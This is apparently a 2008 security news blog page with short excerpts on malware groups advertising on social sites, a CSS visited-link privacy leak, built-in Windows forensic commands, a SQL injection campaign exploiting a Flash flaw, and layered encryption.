Web 2.0 Sites a Thriving Marketplace for Malware

May 30, 2008 – 5:49 AM

A wiry young man with his head shaved and wearing a tank top points a handgun straight at the camera in a disturbing YouTube video. The man wears what appears to be a wedding ring, and he gazes vacantly away from the viewer.

Though it’s an odd image for an advertisement, this video isn’t promoting your average company. It’s from a not-so-underground Albanian hacker group that’s out to make a name for themselves in the thriving world of malware and computer crime. Besides the shot of the gunman, the video showcases images of a computer screen, a table loaded with foreign currency, and plenty of links to the group’s Web site.

Malware is big business, and groups like the Albanian hackers are trying to cash in, using the latest Web 2.0 tools: social networking profiles, blogs, and other publicly available media and Web pages. The digital desperados are moving more and more into wide-scale advertising and brand building on public sites and networks to grow their underground trade.

Read the rest of the story…

CSS exploit allows detection of social site use

May 29, 2008 – 1:23 PM

Web developer Aza Raskin knows we visit Digg, Del.icio.us, Reddit and Facebook without even having to ask.

No, he isn’t employing privacy violating hackery, but he is exploiting a “cute” information leak in CSS that traditionally displays visited links differently than those that have yet to be visited. By loading in an iframe a list of social site URLs to see which are purple (visited) and blue (not visited), an assumption can be made on what sites to prompt users for submitting a story or blog entry.

Raskin has wrapped this functionality in a script called SocialHistory.js.

By employing this script on a blog, you can avoid showing users the traditional mass of social site icons, only a few of which they probably visit. In addition to the large list of social sites checked by SocialHistory — this includes more than 20 of the most-popular names — you additional ones that might be specific to your needs. For instance, you can check to see if the user has visited other blogs you author.

Raskin says while his script isn’t perfect, “it does get you 80% of the way there.” He also says there is little chance the bug — it’s documented in Bugzilla — will be fixed since it’s a core feature of the Web browser.

Read the rest of this story…

Built-in Windows Command-Line Security Tools

May 28, 2008 – 7:59 PM

Links:

Built-in Windows commands to determine if a system has been hacked

More built-in Windows commands for system analysis

New SQL Injection Attacks Exploit Adobe Flash Flaw

May 28, 2008 – 7:52 PM

Mass SQL injection attack, take four: Yet another wave of SQL injection attacks is exploiting an Adobe Flash vulnerability that appears to be coming from the same series of attacks originating from China.

The intent, as in previous attacks, has been to steal online gamers’ password credentials. But given the persistence and scope of the attacks over the past few months, researchers worry that World of Warcraft players and other gaming jocks aren’t the only users at risk in these stubborn Website attacks.

“Even if a user isn’t online-gaming, he or she could become a victim of the attack,” says Ben Greenbaum, senior research manager at Symantec Security Response. “The hostile portion of this content lives on attacker-controlled servers… and they could change their payload at any time,” injecting keyloggers or other more malicious programs to steal personal information, for instance.

Ivan Macalintal, senior research engineer for Trend Micro, agrees. “The payload… could be dynamically changed at any time [by] the remote attacker. If they want to change it to other password stealers, it would be potentially damaging to other users” besides online gamers.

The latest attack works like this: A vulnerable Website is first compromised with a SQL injection attack, and the malicious script that’s injected points a visitor’s browser to a malicious URL that carries ShockWave (SWF) files that exploit the Adobe Flash bug (aka CVE-2007-0071), according to Trend Micro. Then unbeknownst to the user, his or her vulnerable machine downloads the malicious file, which researchers say is either spyware to steal credentials, or some type of Trojan dropper to download other malicious files.

Read the rest of this story…

When To Layer Encryption

May 28, 2008 – 7:36 PM

I used to joke about the client that once told me their management mandated “double encryption” on all financial information after a breach. In their case, they were encrypting their database and backup tapes. Not that there isn’t a valid reason to encrypt databases and backup tapes, but the way they were implementing provided no additional security. Once those card numbers were encrypted in the DB, re-encrypting at the tape level added no value (this wasn’t a case where they were encrypting the tapes to protect information not already encrypted).

But if we go back to the Three Laws of Encryption, there are circumstances where you might consider multiple layers. The most common case is when we are encrypting for media protection, but also need to encrypt for separation of duties.

Full disk encryption is your best bet to protect yourself from information loss due to a lost or stolen laptop, but there are situations where FDE is not enough. It doesn’t protect content from multiple users on a system, say the sensitive financials on the CFOs laptop from the lowly system administrator, nor does it protect content as it moves, say to a USB drive. File level encryption allows more granular options and protection in a wider range of circumstances. But since users are unreliable, and there are places (like virtual memory) where sensitive data can hide, file encryption doesn’t obviate the need for FDE (or an FDE-equivalent).

Thus file encryption is complementary to full drive encryption; each solves a different part of the data protection puzzle. With file encryption you can protect content as you move it off the laptop, protect it from other users (especially administrative users) on the same system, and encrypt data that’s shared across a team using group keys.

Read the rest of this story…